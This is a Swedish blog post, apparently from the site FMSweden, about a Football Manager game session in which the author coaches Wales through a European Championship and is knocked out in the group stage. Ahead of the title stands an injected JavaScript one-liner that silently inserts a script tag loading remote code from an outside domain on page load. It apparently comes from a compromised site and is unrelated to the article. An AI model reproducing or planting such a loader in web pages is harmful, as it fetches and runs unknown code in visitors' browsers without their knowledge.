;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – Please dont take me home – FMSweden
Meny Stäng

Start of the week – Please dont take me home

På fredag drar Europamästerskapet äntligen igång. Själv lyckades man med ett fiasko med England efter att ha åkt ut redan i åttondelsfinalen förra måndagen. Den här måndagen har jag spelat ett Europamästerskap med Wales.

Truppen 

Detta var svårare än med England eftersom man inte har full koll på alla spelare men det viktigaste blev att sätta min elva och sen ha en duglig ersättare på varje position. Elvan som jag satt kommer matchas hårt i EM. Kaptener är Joe Rodon och Aaron Ramsey.

Genrepen

I genrepen fick alla sina chanser att visa vad dem går för. Resultatmässigt förlorade vi 1-0 hemma mot Frankrike och sen blev det även en förlust mot Albanien med 2-1 och det var mycket att fundera på fram till EM premiären

Taktik 

En välbalanserad 4-4-1-1 där stort fokus låg på att försvara och sen ha sylvassa kontringar. I dem flesta matcherna visste vi att motståndarna kommer vara bättre spelare för spelare.

Gruppspel 

Här är gruppen vi hamnade i. Nästa vecka när jag tar över Skottland blir det dem riktiga grupperna. Men här fanns det bra chans att nå en 3:e plats och gå vidare på det.

Wales – Kroatien 0-7

Totalt slaktade. Det var bara ett lag på banan och det hade kunnat sluta med större siffror än detta. Pinsamt! 

Wales – Belarus 0-0 

En bättre insats spelmässigt men långt ifrån tillräckligt bra och det var en match vi verkligen behövde vinna för att nå avancemang. Nu krävdes seger mot Italien i sista matchen.

Wales – Italien 1-2

Bale gör vårt första mål i turneringen i form av 1-0 efter 11 minuter och där och då är vi 2:a i gruppen och vidare. Men från vårt 1-0 mål var det bara Italien på plan. Bale gick ut skadad efter 54 minuter och Locatelli dödade våra hopp om avancemang efter 70 minuter när han tryckte in 2-1-målet för Italien. Ute och ännu ett fiasko för egen del i EM 

Detta var bara pinsamt och dåligt!

Bästa spelare: Så dåligt så ingen kan få det priset men Bale blev bästa målskytt med 1 mål..

Två fiaskon hittills och sista anhalten är Skottland. En turnering där jag måste bevisa mig själv som mästerskapstränare.

Please wait...

Liknande Inlägg

Lämna ett svar